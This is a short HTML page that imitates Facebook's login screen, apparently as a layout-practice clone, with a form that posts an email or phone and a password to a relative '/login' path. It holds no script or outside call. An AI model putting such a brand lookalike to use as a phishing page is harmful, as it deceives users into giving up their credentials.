<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div class="parent">
        <div class="one">
            <h1>facebook</h1>
            <p>Facebook helps you connect and share with the people in your life.</p>
        </div>
        <div class="two">
            <form method="post" action="/login">
                <input type="text" name="username" placeholder="Email address or phone number" required>
                <input type="password" name="pass" placeholder="Password" required>
                <button type="submit" class="blue">Log in</button>
            </form>
            <p id="forgot">Forgotten Password?</p>
            <a href="/signup"><button type="submit" class="green">Create New Account</button></a>
        </div>
    </div>

</body>

</html>